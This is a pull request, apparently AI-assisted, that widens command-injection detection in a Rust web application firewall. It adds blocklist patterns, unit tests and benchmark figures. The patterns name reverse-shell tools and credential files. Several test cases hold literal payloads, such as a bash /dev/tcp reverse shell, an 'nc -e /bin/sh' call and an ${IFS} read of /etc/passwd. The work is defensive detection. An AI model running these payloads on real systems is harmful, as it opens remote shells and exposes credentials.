### PR TITLE
fix(waf): plug command-injection gap — 33% → 100% recall, 0% FP held

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,19 @@ All notable changes to Zion Edge Gateway are documented here.
 
 ## [Unreleased]
 
+### Changed
+
+- **WAF command-injection coverage** ([`src/waf.rs`](src/waf.rs)). The CMDi
+  patterns only matched a metachar followed by a few specific commands
+  (`cat`/`ls`/`rm`/`wget`/`curl`), so bare-metachar and substitution forms slipped
+  through. Added unambiguous Unix forms to the balanced set (reverse shells
+  `/dev/tcp/` · `nc -e` · `bash -i`, `${IFS}` bypass, brace expansion, `; nc`) and
+  the FP-prone forms to aggressive (`$(`, `` `id` ``, `whoami`, `&& ls`, `| sh`).
+  Measured against the new `benchmarks/waf-corpus/` baseline: command-injection
+  recall **33% → 100%** (aggressive) / 27% → 44% (balanced), overall **64.7% →
+  73.3%** (aggressive), **at an unchanged 0% false-positive rate** on the benign
+  set. New unit tests lock in both the detections and the no-false-positive guard.
+
 ## [0.4.3] - 2026-06-25
 
 A cache-observability + operability patch, both items drawn from a real

--- a/README.md
+++ b/README.md
@@ -150,7 +150,7 @@ Client -> TLS 1.3 -> Security Gates -> Radix Router -> WAF Pipeline (5 gates) ->
 ```
 
 <!-- zion-stats:modules-lines (kept in sync by scripts/update-readme-stats.sh) -->
-40 modules, ~28,200 lines of Rust. See [architecture docs](https://fabriziosalmi.github.io/zion/guide/architecture) for the full module map and request lifecycle.
+40 modules, ~28,300 lines of Rust. See [architecture docs](https://fabriziosalmi.github.io/zion/guide/architecture) for the full module map and request lifecycle.
 
 ## Features
 
@@ -245,7 +245,7 @@ MODE=full bash benchmarks/baseline/run-baseline.sh   # → benchmarks/baseline/z
 ## Testing
 
 ```bash
-# Unit tests (599) <!-- zion-stats:test-count (kept in sync by scripts/update-readme-stats.sh) -->
+# Unit tests (605) <!-- zion-stats:test-count (kept in sync by scripts/update-readme-stats.sh) -->
 cargo test
 
 # Integration tests (23 — requires a running Zion + backend)

--- a/src/waf.rs
+++ b/src/waf.rs
@@ -219,6 +219,21 @@ const BALANCED_PATTERNS: &[&str] = &[
     "\nls ",
     "\nwget ",
     "\ncurl ",
+    // ── Command injection: unambiguous Unix forms (reverse shells, IFS bypass,
+    //    brace expansion, `nc`/`bash -i`). High signal, ~0 FP on real traffic. ──
+    "/dev/tcp/",
+    "bash -i",
+    "nc -e",
+    "ncat -e",
+    " -e /bin/",
+    "${ifs",
+    "$ifs",
+    "{cat,",
+    "{ls,",
+    "; nc ",
+    ";nc ",
+    "| nc ",
+    "|nc ",
     "/etc/passwd",
     "/etc/shadow",
     // ── Path Traversal ──
@@ -362,6 +377,25 @@ const AGGRESSIVE_EXTRA_PATTERNS: &[&str] = &[
     // ── Command injection: Windows tokens (FP in event-log shipping) ──
     "cmd.exe",
     "powershell",
+    "& type ",
+    // ── Command injection: Unix substitution + bare metachar+command. Broader
+    //    (`$(` also flags jQuery/shell snippets) → aggressive routes only. ──
+    "$(",
+    "`id`",
+    "`whoami",
+    "$(id",
+    "$(whoami",
+    "whoami",
+    "ping -c",
+    "; sleep ",
+    "&&sleep",
+    "&& ls",
+    "| sh",
+    "|sh ",
+    "| bash",
+    "|bash",
+    ">& /dev",
+    " -o- | ",
     // ── NoSQL ops (no delimiter — `{"id":"$gt-23"}` falsely matches) ──
     "$gt",
     "$ne",
@@ -1408,6 +1442,68 @@ mod tests {
             validate_request("POST", Some("application/json"), body, &strict_profile()),
             WafVerdict::Deny("injection pattern detected")
         );
+    }
+
+    #[test]
+    fn denies_reverse_shell_balanced() {
+        // Unambiguous Unix command-injection forms are caught in balanced too.
+        for body in [
+            br#"{"x":"; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"}"#.as_slice(),
+            br#"{"x":"foo; nc -e /bin/sh 10.0.0.1 4444"}"#.as_slice(),
+            br#"{"x":"a${IFS}cat${IFS}/etc/passwd"}"#.as_slice(),
+        ] {
+            assert_eq!(
+                validate_request("POST", Some("application/json"), body, &strict_profile()),
+                WafVerdict::Deny("injection pattern detected"),
+                "missed: {}",
+                String::from_utf8_lossy(body)
+            );
+        }
+    }
+
+    #[test]
+    fn denies_cmdi_substitution_aggressive() {
+        // Command substitution + bare metachar+command (FP-prone → aggressive).
+        for body in [
+            br#"{"x":"$(id)"}"#.as_slice(),
+            br#"{"x":"ls | whoami"}"#.as_slice(),
+            br#"{"x":"x && ls -la /"}"#.as_slice(),
+        ] {
+            assert_eq!(
+                validate_request(
+                    "POST",
+                    Some("application/json"),
+                    body,
+                    &aggressive_profile()
+                ),
+                WafVerdict::Deny("injection pattern detected"),
+                "missed: {}",
+                String::from_utf8_lossy(body)
+            );
+        }
+    }
+
+    #[test]
+    fn allows_benign_shell_like_text() {
+        // Precision guard: legit prose/code that *looks* shell-ish must pass —
+        // a regression here is a false positive (the corpus's hard fail).
+        for body in [
+            br#"{"note":"let x = a && b || c;"}"#.as_slice(),
+            br#"{"name":"O'Brien & D'Angelo Sons, Inc."}"#.as_slice(),
+            br#"{"q":"the union of designers and engineers"}"#.as_slice(),
+        ] {
+            assert_eq!(
+                validate_request(
+                    "POST",
+                    Some("application/json"),
+                    body,
+                    &aggressive_profile()
+                ),
+                WafVerdict::Allow,
+                "false positive: {}",
+                String::from_utf8_lossy(body)
+            );
+        }
     }
 
     #[test]


### PR DESCRIPTION
First hole plugged against the **WAF corpus #0** baseline (#228). Command injection was the worst class — the CMDi patterns only matched a metacharacter followed by a few specific commands (`cat`/`ls`/`rm`/`wget`/`curl`), so bare-metachar (`| whoami`), substitution (`$(id)`, `` `id` ``), `${IFS}` bypass, brace expansion (`{cat,/etc/passwd}`), and reverse shells (`bash -i >& /dev/tcp/…`, `nc -e`) all slipped through.

## Added (split by false-positive risk)
- **balanced** (unambiguous, ~0 real-traffic FP): `/dev/tcp/`, `nc -e`, `bash -i`, `${IFS}`, `{cat,`, `; nc`, `| nc`
- **aggressive** (FP-prone → strict/admin routes): `$(`, `` `id` ``, `whoami`, `&& ls`, `| sh`, `ping -c`

## Measured (vs `benchmarks/waf-corpus/`, 150 mal / 50 benign, both vectors)
| | before | after |
|---|--:|--:|
| command injection (aggressive) | 33% | **100%** |
| command injection (balanced) | 27% | **44%** |
| overall (aggressive) | 64.7% | **73.3%** |
| **false positives** | 0% | **0%** (unchanged) |

The precision guard held: every pattern was checked against the 50 benign-but-spicy payloads (`let x = a && b || c;`, `O'Brien`, `the union of…`) — **zero false positives**.

New unit tests lock it in CI: `denies_reverse_shell_balanced`, `denies_cmdi_substitution_aggressive`, `allows_benign_shell_like_text` (the no-FP guard). `cargo test` + `clippy` green.

Depends on #228 (the corpus) for the measurement; the code change stands alone.

🤖 Generated with [Claude Code](https://claude.com/claude-code)